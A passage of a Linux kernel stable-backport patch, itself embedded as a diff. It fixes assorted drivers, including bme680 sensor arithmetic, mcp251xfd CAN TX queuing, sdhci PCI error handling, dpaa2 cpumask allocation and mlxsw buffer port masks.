+ 	var2 = var2 + (var1 * calib->par_p5 << 1);
+-	var2 = (var2 >> 2) + (calib->par_p4 << 16);
++	var2 = (var2 >> 2) + ((s32)calib->par_p4 << 16);
+ 	var1 = (((((var1 >> 2) * (var1 >> 2)) >> 13) *
+-			(calib->par_p3 << 5)) >> 3) +
++			((s32)calib->par_p3 << 5)) >> 3) +
+ 			((calib->par_p2 * var1) >> 1);
+ 	var1 = var1 >> 18;
+ 	var1 = ((32768 + var1) * calib->par_p1) >> 15;
+@@ -388,7 +389,7 @@ static u32 bme680_compensate_press(struct bme680_data *data,
+ 	var3 = ((press_comp >> 8) * (press_comp >> 8) *
+ 			(press_comp >> 8) * calib->par_p10) >> 17;
+ 
+-	press_comp += (var1 + var2 + var3 + (calib->par_p7 << 7)) >> 4;
++	press_comp += (var1 + var2 + var3 + ((s32)calib->par_p7 << 7)) >> 4;
+ 
+ 	return press_comp;
+ }
+@@ -414,7 +415,7 @@ static u32 bme680_compensate_humid(struct bme680_data *data,
+ 		 (((temp_scaled * ((temp_scaled * calib->par_h5) / 100))
+ 		   >> 6) / 100) + (1 << 14))) >> 10;
+ 	var3 = var1 * var2;
+-	var4 = calib->par_h6 << 7;
++	var4 = (s32)calib->par_h6 << 7;
+ 	var4 = (var4 + ((temp_scaled * calib->par_h7) / 100)) >> 4;
+ 	var5 = ((var3 >> 14) * (var3 >> 14)) >> 10;
+ 	var6 = (var4 * var5) >> 1;
+@@ -532,6 +533,43 @@ static u8 bme680_oversampling_to_reg(u8 val)
+ 	return ilog2(val) + 1;
+ }
+ 
++/*
++ * Taken from Bosch BME680 API:
++ * https://github.com/boschsensortec/BME68x_SensorAPI/blob/v4.4.8/bme68x.c#L490
++ */
++static int bme680_wait_for_eoc(struct bme680_data *data)
++{
++	struct device *dev = regmap_get_device(data->regmap);
++	unsigned int check;
++	int ret;
++	/*
++	 * (Sum of oversampling ratios * time per oversampling) +
++	 * TPH measurement + gas measurement + wait transition from forced mode
++	 * + heater duration
++	 */
++	int wait_eoc_us = ((data->oversampling_temp + data->oversampling_press +
++			   data->oversampling_humid) * 1936) + (477 * 4) +
++			   (477 * 5) + 1000 + (data->heater_dur * 1000);
++
++	usleep_range(wait_eoc_us, wait_eoc_us + 100);
++
++	ret = regmap_read(data->regmap, BME680_REG_MEAS_STAT_0, &check);
++	if (ret) {
++		dev_err(dev, "failed to read measurement status register.\n");
++		return ret;
++	}
++	if (check & BME680_MEAS_BIT) {
++		dev_err(dev, "Device measurement cycle incomplete.\n");
++		return -EBUSY;
++	}
++	if (!(check & BME680_NEW_DATA_BIT)) {
++		dev_err(dev, "No new data available from the device.\n");
++		return -ENODATA;
++	}
++
++	return 0;
++}
++
+ static int bme680_chip_config(struct bme680_data *data)
+ {
+ 	struct device *dev = regmap_get_device(data->regmap);
+@@ -622,6 +660,10 @@ static int bme680_read_temp(struct bme680_data *data, int *val)
+ 	if (ret < 0)
+ 		return ret;
+ 
++	ret = bme680_wait_for_eoc(data);
++	if (ret)
++		return ret;
++
+ 	ret = regmap_bulk_read(data->regmap, BME680_REG_TEMP_MSB,
+ 			       &tmp, 3);
+ 	if (ret < 0) {
+@@ -678,7 +720,7 @@ static int bme680_read_press(struct bme680_data *data,
+ 	}
+ 
+ 	*val = bme680_compensate_press(data, adc_press);
+-	*val2 = 100;
++	*val2 = 1000;
+ 	return IIO_VAL_FRACTIONAL;
+ }
+ 
+@@ -738,6 +780,10 @@ static int bme680_read_gas(struct bme680_data *data,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	ret = bme680_wait_for_eoc(data);
++	if (ret)
++		return ret;
++
+ 	ret = regmap_read(data->regmap, BME680_REG_MEAS_STAT_0, &check);
+ 	if (check & BME680_GAS_MEAS_BIT) {
+ 		dev_err(dev, "gas measurement incomplete\n");
+diff --git a/drivers/infiniband/core/restrack.c b/drivers/infiniband/core/restrack.c
+index 01a499a8b88db..438ed35881752 100644
+--- a/drivers/infiniband/core/restrack.c
++++ b/drivers/infiniband/core/restrack.c
+@@ -37,22 +37,6 @@ int rdma_restrack_init(struct ib_device *dev)
+ 	return 0;
+ }
+ 
+-static const char *type2str(enum rdma_restrack_type type)
+-{
+-	static const char * const names[RDMA_RESTRACK_MAX] = {
+-		[RDMA_RESTRACK_PD] = "PD",
+-		[RDMA_RESTRACK_CQ] = "CQ",
+-		[RDMA_RESTRACK_QP] = "QP",
+-		[RDMA_RESTRACK_CM_ID] = "CM_ID",
+-		[RDMA_RESTRACK_MR] = "MR",
+-		[RDMA_RESTRACK_CTX] = "CTX",
+-		[RDMA_RESTRACK_COUNTER] = "COUNTER",
+-		[RDMA_RESTRACK_SRQ] = "SRQ",
+-	};
+-
+-	return names[type];
+-};
+-
+ /**
+  * rdma_restrack_clean() - clean resource tracking
+  * @dev:  IB device
+@@ -60,47 +44,14 @@ static const char *type2str(enum rdma_restrack_type type)
+ void rdma_restrack_clean(struct ib_device *dev)
+ {
+ 	struct rdma_restrack_root *rt = dev->res;
+-	struct rdma_restrack_entry *e;
+-	char buf[TASK_COMM_LEN];
+-	bool found = false;
+-	const char *owner;
+ 	int i;
+ 
+ 	for (i = 0 ; i < RDMA_RESTRACK_MAX; i++) {
+ 		struct xarray *xa = &dev->res[i].xa;
+ 
+-		if (!xa_empty(xa)) {
+-			unsigned long index;
+-
+-			if (!found) {
+-				pr_err("restrack: %s", CUT_HERE);
+-				dev_err(&dev->dev, "BUG: RESTRACK detected leak of resources\n");
+-			}
+-			xa_for_each(xa, index, e) {
+-				if (rdma_is_kernel_res(e)) {
+-					owner = e->kern_name;
+-				} else {
+-					/*
+-					 * There is no need to call get_task_struct here,
+-					 * because we can be here only if there are more
+-					 * get_task_struct() call than put_task_struct().
+-					 */
+-					get_task_comm(buf, e->task);
+-					owner = buf;
+-				}
+-
+-				pr_err("restrack: %s %s object allocated by %s is not freed\n",
+-				       rdma_is_kernel_res(e) ? "Kernel" :
+-							       "User",
+-				       type2str(e->type), owner);
+-			}
+-			found = true;
+-		}
++		WARN_ON(!xa_empty(xa));
+ 		xa_destroy(xa);
+ 	}
+-	if (found)
+-		pr_err("restrack: %s", CUT_HERE);
+-
+ 	kfree(rt);
+ }
+ 
+diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
+index e9bd36adbe47d..e3a36cd3656c0 100644
+--- a/drivers/input/touchscreen/ili210x.c
++++ b/drivers/input/touchscreen/ili210x.c
+@@ -261,8 +261,8 @@ static int ili251x_read_touch_data(struct i2c_client *client, u8 *data)
+ 	if (!error && data[0] == 2) {
+ 		error = i2c_master_recv(client, data + ILI251X_DATA_SIZE1,
+ 					ILI251X_DATA_SIZE2);
+-		if (error >= 0 && error != ILI251X_DATA_SIZE2)
+-			error = -EIO;
++		if (error >= 0)
++			error = error == ILI251X_DATA_SIZE2 ? 0 : -EIO;
+ 	}
+ 
+ 	return error;
+diff --git a/drivers/irqchip/irq-loongson-liointc.c b/drivers/irqchip/irq-loongson-liointc.c
+index c4584e2f0ad3d..37b05567fb0ed 100644
+--- a/drivers/irqchip/irq-loongson-liointc.c
++++ b/drivers/irqchip/irq-loongson-liointc.c
+@@ -28,7 +28,7 @@
+ 
+ #define LIOINTC_INTC_CHIP_START	0x20
+ 
+-#define LIOINTC_REG_INTC_STATUS	(LIOINTC_INTC_CHIP_START + 0x20)
++#define LIOINTC_REG_INTC_STATUS(core)	(LIOINTC_INTC_CHIP_START + 0x20 + (core) * 8)
+ #define LIOINTC_REG_INTC_EN_STATUS	(LIOINTC_INTC_CHIP_START + 0x04)
+ #define LIOINTC_REG_INTC_ENABLE	(LIOINTC_INTC_CHIP_START + 0x08)
+ #define LIOINTC_REG_INTC_DISABLE	(LIOINTC_INTC_CHIP_START + 0x0c)
+@@ -196,7 +196,7 @@ static int liointc_init(phys_addr_t addr, unsigned long size, int revision,
+ 		goto out_free_priv;
+ 
+ 	for (i = 0; i < LIOINTC_NUM_CORES; i++)
+-		priv->core_isr[i] = base + LIOINTC_REG_INTC_STATUS;
++		priv->core_isr[i] = base + LIOINTC_REG_INTC_STATUS(i);
+ 
+ 	for (i = 0; i < LIOINTC_NUM_PARENT; i++)
+ 		priv->handler[i].parent_int_map = parent_int_map[i];
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index aefee2277254d..04b7ce479fc38 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -964,7 +964,7 @@ int dvb_usercopy(struct file *file,
+ 		     int (*func)(struct file *file,
+ 		     unsigned int cmd, void *arg))
+ {
+-	char    sbuf[128];
++	char    sbuf[128] = {};
+ 	void    *mbuf = NULL;
+ 	void    *parg = NULL;
+ 	int     err  = -EINVAL;
+diff --git a/drivers/mmc/host/sdhci-brcmstb.c b/drivers/mmc/host/sdhci-brcmstb.c
+index 55d8bd232695c..5b650d5dd0ae6 100644
+--- a/drivers/mmc/host/sdhci-brcmstb.c
++++ b/drivers/mmc/host/sdhci-brcmstb.c
+@@ -23,6 +23,7 @@
+ #define BRCMSTB_MATCH_FLAGS_NO_64BIT		BIT(0)
+ #define BRCMSTB_MATCH_FLAGS_BROKEN_TIMEOUT	BIT(1)
+ #define BRCMSTB_MATCH_FLAGS_HAS_CLOCK_GATE	BIT(2)
++#define BRCMSTB_MATCH_FLAGS_USE_CARD_BUSY	BIT(4)
+ 
+ #define BRCMSTB_PRIV_FLAGS_HAS_CQE		BIT(0)
+ #define BRCMSTB_PRIV_FLAGS_GATE_CLOCK		BIT(1)
+@@ -335,6 +336,9 @@ static int sdhci_brcmstb_probe(struct platform_device *pdev)
+ 	if (match_priv->flags & BRCMSTB_MATCH_FLAGS_BROKEN_TIMEOUT)
+ 		host->quirks |= SDHCI_QUIRK_BROKEN_TIMEOUT_VAL;
+ 
++	if (!(match_priv->flags & BRCMSTB_MATCH_FLAGS_USE_CARD_BUSY))
++		host->mmc_host_ops.card_busy = NULL;
++
+ 	/* Change the base clock frequency if the DT property exists */
+ 	if (device_property_read_u32(&pdev->dev, "clock-frequency",
+ 				     &priv->base_freq_hz) != 0)
+diff --git a/drivers/mmc/host/sdhci-pci-core.c b/drivers/mmc/host/sdhci-pci-core.c
+index 28dc65023fa9f..bda9e10df2507 100644
+--- a/drivers/mmc/host/sdhci-pci-core.c
++++ b/drivers/mmc/host/sdhci-pci-core.c
+@@ -1330,7 +1330,7 @@ static int jmicron_pmos(struct sdhci_pci_chip *chip, int on)
+ 
+ 	ret = pci_read_config_byte(chip->pdev, 0xAE, &scratch);
+ 	if (ret)
+-		return ret;
++		goto fail;
+ 
+ 	/*
+ 	 * Turn PMOS on [bit 0], set over current detection to 2.4 V
+@@ -1341,7 +1341,10 @@ static int jmicron_pmos(struct sdhci_pci_chip *chip, int on)
+ 	else
+ 		scratch &= ~0x47;
+ 
+-	return pci_write_config_byte(chip->pdev, 0xAE, scratch);
++	ret = pci_write_config_byte(chip->pdev, 0xAE, scratch);
++
++fail:
++	return pcibios_err_to_errno(ret);
+ }
+ 
+ static int jmicron_probe(struct sdhci_pci_chip *chip)
+@@ -2201,7 +2204,7 @@ static int sdhci_pci_probe(struct pci_dev *pdev,
+ 
+ 	ret = pci_read_config_byte(pdev, PCI_SLOT_INFO, &slots);
+ 	if (ret)
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 
+ 	slots = PCI_SLOT_INFO_SLOTS(slots) + 1;
+ 	dev_dbg(&pdev->dev, "found %d slot(s)\n", slots);
+@@ -2210,7 +2213,7 @@ static int sdhci_pci_probe(struct pci_dev *pdev,
+ 
+ 	ret = pci_read_config_byte(pdev, PCI_SLOT_INFO, &first_bar);
+ 	if (ret)
+-		return ret;
++		return pcibios_err_to_errno(ret);
+ 
+ 	first_bar &= PCI_SLOT_INFO_FIRST_BAR_MASK;
+ 
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index 111f7c6770605..4237d8ae878c1 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -2539,26 +2539,29 @@ EXPORT_SYMBOL_GPL(sdhci_get_cd_nogpio);
+ 
+ static int sdhci_check_ro(struct sdhci_host *host)
+ {
+-	unsigned long flags;
++	bool allow_invert = false;
+ 	int is_readonly;
+ 
+-	spin_lock_irqsave(&host->lock, flags);
+-
+-	if (host->flags & SDHCI_DEVICE_DEAD)
++	if (host->flags & SDHCI_DEVICE_DEAD) {
+ 		is_readonly = 0;
+-	else if (host->ops->get_ro)
++	} else if (host->ops->get_ro) {
+ 		is_readonly = host->ops->get_ro(host);
+-	else if (mmc_can_gpio_ro(host->mmc))
++	} else if (mmc_can_gpio_ro(host->mmc)) {
+ 		is_readonly = mmc_gpio_get_ro(host->mmc);
+-	else
++		/* Do not invert twice */
++		allow_invert = !(host->mmc->caps2 & MMC_CAP2_RO_ACTIVE_HIGH);
++	} else {
+ 		is_readonly = !(sdhci_readl(host, SDHCI_PRESENT_STATE)
+ 				& SDHCI_WRITE_PROTECT);
++		allow_invert = true;
++	}
+ 
+-	spin_unlock_irqrestore(&host->lock, flags);
++	if (is_readonly >= 0 &&
++	    allow_invert &&
++	    (host->quirks & SDHCI_QUIRK_INVERTED_WRITE_PROTECT))
++		is_readonly = !is_readonly;
+ 
+-	/* This quirk needs to be replaced by a callback-function later */
+-	return host->quirks & SDHCI_QUIRK_INVERTED_WRITE_PROTECT ?
+-		!is_readonly : is_readonly;
++	return is_readonly;
+ }
+ 
+ #define SAMPLE_COUNT	5
+diff --git a/drivers/mtd/parsers/redboot.c b/drivers/mtd/parsers/redboot.c
+index a16b42a885816..3b55b676ca6b9 100644
+--- a/drivers/mtd/parsers/redboot.c
++++ b/drivers/mtd/parsers/redboot.c
+@@ -102,7 +102,7 @@ static int parse_redboot_partitions(struct mtd_info *master,
+ 			offset -= master->erasesize;
+ 		}
+ 	} else {
+-		offset = directory * master->erasesize;
++		offset = (unsigned long) directory * master->erasesize;
+ 		while (mtd_block_isbad(master, offset)) {
+ 			offset += master->erasesize;
+ 			if (offset == master->size)
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index eebf967f4711a..1665f78abb5c9 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -1618,11 +1618,20 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 	clear_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+ 	can_rx_offload_enable(&priv->offload);
+ 
++	priv->wq = alloc_ordered_workqueue("%s-mcp251xfd_wq",
++					   WQ_FREEZABLE | WQ_MEM_RECLAIM,
++					   dev_name(&spi->dev));
++	if (!priv->wq) {
++		err = -ENOMEM;
++		goto out_can_rx_offload_disable;
++	}
++	INIT_WORK(&priv->tx_work, mcp251xfd_tx_obj_write_sync);
++
+ 	err = request_threaded_irq(spi->irq, NULL, mcp251xfd_irq,
+ 				   IRQF_SHARED | IRQF_ONESHOT,
+ 				   dev_name(&spi->dev), priv);
+ 	if (err)
+-		goto out_can_rx_offload_disable;
++		goto out_destroy_workqueue;
+ 
+ 	err = mcp251xfd_chip_interrupts_enable(priv);
+ 	if (err)
+@@ -1634,6 +1643,8 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 
+  out_free_irq:
+ 	free_irq(spi->irq, priv);
++ out_destroy_workqueue:
++	destroy_workqueue(priv->wq);
+  out_can_rx_offload_disable:
+ 	can_rx_offload_disable(&priv->offload);
+ 	set_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+@@ -1661,6 +1672,7 @@ static int mcp251xfd_stop(struct net_device *ndev)
+ 	hrtimer_cancel(&priv->tx_irq_timer);
+ 	mcp251xfd_chip_interrupts_disable(priv);
+ 	free_irq(ndev->irq, priv);
++	destroy_workqueue(priv->wq);
+ 	can_rx_offload_disable(&priv->offload);
+ 	mcp251xfd_timestamp_stop(priv);
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c
+index 160528d3cc26b..b1de8052a45cc 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tx.c
+@@ -131,6 +131,39 @@ mcp251xfd_tx_obj_from_skb(const struct mcp251xfd_priv *priv,
+ 	tx_obj->xfer[0].len = len;
+ }
+ 
++static void mcp251xfd_tx_failure_drop(const struct mcp251xfd_priv *priv,
++				      struct mcp251xfd_tx_ring *tx_ring,
++				      int err)
++{
++	struct net_device *ndev = priv->ndev;
++	struct net_device_stats *stats = &ndev->stats;
++	unsigned int frame_len = 0;
++	u8 tx_head;
++
++	tx_ring->head--;
++	stats->tx_dropped++;
++	tx_head = mcp251xfd_get_tx_head(tx_ring);
++	can_free_echo_skb(ndev, tx_head, &frame_len);
++	netdev_completed_queue(ndev, 1, frame_len);
++	netif_wake_queue(ndev);
++
++	if (net_ratelimit())
++		netdev_err(priv->ndev, "ERROR in %s: %d\n", __func__, err);
++}
++
++void mcp251xfd_tx_obj_write_sync(struct work_struct *work)
++{
++	struct mcp251xfd_priv *priv = container_of(work, struct mcp251xfd_priv,
++						   tx_work);
++	struct mcp251xfd_tx_obj *tx_obj = priv->tx_work_obj;
++	struct mcp251xfd_tx_ring *tx_ring = priv->tx;
++	int err;
++
++	err = spi_sync(priv->spi, &tx_obj->msg);
++	if (err)
++		mcp251xfd_tx_failure_drop(priv, tx_ring, err);
++}
++
+ static int mcp251xfd_tx_obj_write(const struct mcp251xfd_priv *priv,
+ 				  struct mcp251xfd_tx_obj *tx_obj)
+ {
+@@ -162,6 +195,11 @@ static bool mcp251xfd_tx_busy(const struct mcp251xfd_priv *priv,
+ 	return false;
+ }
+ 
++static bool mcp251xfd_work_busy(struct work_struct *work)
++{
++	return work_busy(work);
++}
++
+ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 				 struct net_device *ndev)
+ {
+@@ -175,7 +213,8 @@ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 	if (can_dev_dropped_skb(ndev, skb))
+ 		return NETDEV_TX_OK;
+ 
+-	if (mcp251xfd_tx_busy(priv, tx_ring))
++	if (mcp251xfd_tx_busy(priv, tx_ring) ||
++	    mcp251xfd_work_busy(&priv->tx_work))
+ 		return NETDEV_TX_BUSY;
+ 
+ 	tx_obj = mcp251xfd_get_tx_obj_next(tx_ring);
+@@ -193,13 +232,13 @@ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 		netdev_sent_queue(priv->ndev, frame_len);
+ 
+ 	err = mcp251xfd_tx_obj_write(priv, tx_obj);
+-	if (err)
+-		goto out_err;
+-
+-	return NETDEV_TX_OK;
+-
+- out_err:
+-	netdev_err(priv->ndev, "ERROR in %s: %d\n", __func__, err);
++	if (err == -EBUSY) {
++		netif_stop_queue(ndev);
++		priv->tx_work_obj = tx_obj;
++		queue_work(priv->wq, &priv->tx_work);
++	} else if (err) {
++		mcp251xfd_tx_failure_drop(priv, tx_ring, err);
++	}
+ 
+ 	return NETDEV_TX_OK;
+ }
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index ba0fd2b95a52a..b98ded7098a5a 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -628,6 +628,10 @@ struct mcp251xfd_priv {
+ 	struct mcp251xfd_rx_ring *rx[MCP251XFD_FIFO_RX_NUM];
+ 	struct mcp251xfd_tx_ring tx[MCP251XFD_FIFO_TX_NUM];
+ 
++	struct workqueue_struct *wq;
++	struct work_struct tx_work;
++	struct mcp251xfd_tx_obj *tx_work_obj;
++
+ 	DECLARE_BITMAP(flags, __MCP251XFD_FLAGS_SIZE__);
+ 
+ 	u8 rx_ring_num;
+@@ -934,6 +938,7 @@ void mcp251xfd_skb_set_timestamp(const struct mcp251xfd_priv *priv,
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_stop(struct mcp251xfd_priv *priv);
+ 
++void mcp251xfd_tx_obj_write_sync(struct work_struct *work);
+ netdev_tx_t mcp251xfd_start_xmit(struct sk_buff *skb,
+ 				 struct net_device *ndev);
+ 
+diff --git a/drivers/net/dsa/microchip/ksz9477.c b/drivers/net/dsa/microchip/ksz9477.c
+index a736971470534..e9fa92a833227 100644
+--- a/drivers/net/dsa/microchip/ksz9477.c
++++ b/drivers/net/dsa/microchip/ksz9477.c
+@@ -183,10 +183,8 @@ int ksz9477_reset_switch(struct ksz_device *dev)
+ 			   SPI_AUTO_EDGE_DETECTION, 0);
+ 
+ 	/* default configuration */
+-	ksz_read8(dev, REG_SW_LUE_CTRL_1, &data8);
+-	data8 = SW_AGING_ENABLE | SW_LINK_AUTO_AGING |
+-	      SW_SRC_ADDR_FILTER | SW_FLUSH_STP_TABLE | SW_FLUSH_MSTP_TABLE;
+-	ksz_write8(dev, REG_SW_LUE_CTRL_1, data8);
++	ksz_write8(dev, REG_SW_LUE_CTRL_1,
++		   SW_AGING_ENABLE | SW_LINK_AUTO_AGING | SW_SRC_ADDR_FILTER);
+ 
+ 	/* disable interrupts */
+ 	ksz_write32(dev, REG_SW_INT_MASK__4, SWITCH_INT_MASK);
+@@ -1152,6 +1150,10 @@ int ksz9477_setup(struct dsa_switch *ds)
+ 	/* Enable REG_SW_MTU__2 reg by setting SW_JUMBO_PACKET */
+ 	ksz_cfg(dev, REG_SW_MAC_CTRL_1, SW_JUMBO_PACKET, true);
+ 
++	/* Use collision based back pressure mode. */
++	ksz_cfg(dev, REG_SW_MAC_CTRL_1, SW_BACK_PRESSURE,
++		SW_BACK_PRESSURE_COLLISION);
++
+ 	/* Now we can configure default MTU value */
+ 	ret = regmap_update_bits(dev->regmap[1], REG_SW_MTU__2, REG_SW_MTU_MASK,
+ 				 VLAN_ETH_FRAME_LEN + ETH_FCS_LEN);
+diff --git a/drivers/net/dsa/microchip/ksz9477_reg.h b/drivers/net/dsa/microchip/ksz9477_reg.h
+index 53c68d286dd3a..04086e9ab0a0f 100644
+--- a/drivers/net/dsa/microchip/ksz9477_reg.h
++++ b/drivers/net/dsa/microchip/ksz9477_reg.h
+@@ -267,6 +267,7 @@
+ #define REG_SW_MAC_CTRL_1		0x0331
+ 
+ #define SW_BACK_PRESSURE		BIT(5)
++#define SW_BACK_PRESSURE_COLLISION	0
+ #define FAIR_FLOW_CTRL			BIT(4)
+ #define NO_EXC_COLLISION_DROP		BIT(3)
+ #define SW_JUMBO_PACKET			BIT(2)
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index f9f43897f86c1..9dbe188f09c3c 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -1790,7 +1790,7 @@ static void ksz_irq_bus_sync_unlock(struct irq_data *d)
+ 	struct ksz_device *dev = kirq->dev;
+ 	int ret;
+ 
+-	ret = ksz_write32(dev, kirq->reg_mask, kirq->masked);
++	ret = ksz_write8(dev, kirq->reg_mask, kirq->masked);
+ 	if (ret)
+ 		dev_err(dev->dev, "failed to change IRQ mask\n");
+ 
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index de62eee58a00e..bbbe7c5b5d35a 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -2754,11 +2754,14 @@ static int dpaa2_eth_xdp_xmit(struct net_device *net_dev, int n,
+ static int update_xps(struct dpaa2_eth_priv *priv)
+ {
+ 	struct net_device *net_dev = priv->net_dev;
+-	struct cpumask xps_mask;
+-	struct dpaa2_eth_fq *fq;
+ 	int i, num_queues, netdev_queues;
++	struct dpaa2_eth_fq *fq;
++	cpumask_var_t xps_mask;
+ 	int err = 0;
+ 
++	if (!alloc_cpumask_var(&xps_mask, GFP_KERNEL))
++		return -ENOMEM;
++
+ 	num_queues = dpaa2_eth_queue_count(priv);
+ 	netdev_queues = (net_dev->num_tc ? : 1) * num_queues;
+ 
+@@ -2768,16 +2771,17 @@ static int update_xps(struct dpaa2_eth_priv *priv)
+ 	for (i = 0; i < netdev_queues; i++) {
+ 		fq = &priv->fq[i % num_queues];
+ 
+-		cpumask_clear(&xps_mask);
+-		cpumask_set_cpu(fq->target_cpu, &xps_mask);
++		cpumask_clear(xps_mask);
++		cpumask_set_cpu(fq->target_cpu, xps_mask);
+ 
+-		err = netif_set_xps_queue(net_dev, &xps_mask, i);
++		err = netif_set_xps_queue(net_dev, xps_mask, i);
+ 		if (err) {
+ 			netdev_warn_once(net_dev, "Error setting XPS queue\n");
+ 			break;
+ 		}
+ 	}
+ 
++	free_cpumask_var(xps_mask);
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/ibm/ibmvnic.c b/drivers/net/ethernet/ibm/ibmvnic.c
+index 157be4e9be4b7..8f377d0a80fe6 100644
+--- a/drivers/net/ethernet/ibm/ibmvnic.c
++++ b/drivers/net/ethernet/ibm/ibmvnic.c
+@@ -3859,6 +3859,12 @@ static void release_sub_crqs(struct ibmvnic_adapter *adapter, bool do_h_free)
+ 		adapter->num_active_tx_scrqs = 0;
+ 	}
+ 
++	/* Clean any remaining outstanding SKBs
++	 * we freed the irq so we won't be hearing
++	 * from them
++	 */
++	clean_tx_pools(adapter);
++
+ 	if (adapter->rx_scrq) {
+ 		for (i = 0; i < adapter->num_active_rx_scrqs; i++) {
+ 			if (!adapter->rx_scrq[i])
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c
+index c9f1c79f3f9d0..ba090262e27ef 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_buffers.c
+@@ -1607,8 +1607,8 @@ static void mlxsw_sp_sb_sr_occ_query_cb(struct mlxsw_core *mlxsw_core,
+ int mlxsw_sp_sb_occ_snapshot(struct mlxsw_core *mlxsw_core,
+ 			     unsigned int sb_index)
+ {
++	u16 local_port, local_port_1, first_local_port, last_local_port;
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_core_driver_priv(mlxsw_core);
+-	u16 local_port, local_port_1, last_local_port;
+ 	struct mlxsw_sp_sb_sr_occ_query_cb_ctx cb_ctx;
+ 	u8 masked_count, current_page = 0;
+ 	unsigned long cb_priv = 0;
+@@ -1628,6 +1628,7 @@ int mlxsw_sp_sb_occ_snapshot(struct mlxsw_core *mlxsw_core,
+ 	masked_count = 0;
+ 	mlxsw_reg_sbsr_pack(sbsr_pl, false);
+ 	mlxsw_reg_sbsr_port_page_set(sbsr_pl, current_page);
++	first_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE;
+ 	last_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE +
+ 			  MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE - 1;
+ 
+@@ -1645,9 +1646,12 @@ int mlxsw_sp_sb_occ_snapshot(struct mlxsw_core *mlxsw_core,
+ 		if (local_port != MLXSW_PORT_CPU_PORT) {
+ 			/* Ingress quotas are not supported for the CPU port */
+ 			mlxsw_reg_sbsr_ingress_port_mask_set(sbsr_pl,
+-							     local_port, 1);
++							     local_port - first_local_port,
++							     1);
+ 		}
+-		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl, local_port, 1);
++		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl,
++						    local_port - first_local_port,
++						    1);
+ 		for (i = 0; i < mlxsw_sp->sb_vals->pool_count; i++) {
+ 			err = mlxsw_sp_sb_pm_occ_query(mlxsw_sp, local_port, i,
+ 						       &bulk_list);
+@@ -1684,7 +1688,7 @@ int mlxsw_sp_sb_occ_max_clear(struct mlxsw_core *mlxsw_core,
+ 			      unsigned int sb_index)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_core_driver_priv(mlxsw_core);
+-	u16 local_port, last_local_port;
++	u16 local_port, first_local_port, last_local_port;
+ 	LIST_HEAD(bulk_list);
+ 	unsigned int masked_count;
+ 	u8 current_page = 0;
+@@ -1702,6 +1706,7 @@ int mlxsw_sp_sb_occ_max_clear(struct mlxsw_core *mlxsw_core,
+ 	masked_count = 0;
+ 	mlxsw_reg_sbsr_pack(sbsr_pl, true);
+ 	mlxsw_reg_sbsr_port_page_set(sbsr_pl, current_page);
++	first_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE;
+ 	last_local_port = current_page * MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE +
+ 			  MLXSW_REG_SBSR_NUM_PORTS_IN_PAGE - 1;
+ 
+@@ -1719,9 +1724,12 @@ int mlxsw_sp_sb_occ_max_clear(struct mlxsw_core *mlxsw_core,
+ 		if (local_port != MLXSW_PORT_CPU_PORT) {
+ 			/* Ingress quotas are not supported for the CPU port */
+ 			mlxsw_reg_sbsr_ingress_port_mask_set(sbsr_pl,
+-							     local_port, 1);
++							     local_port - first_local_port,
++							     1);
+ 		}
+-		mlxsw_reg_sbsr_egress_port_mask_set(sbsr_pl, local_port, 1);
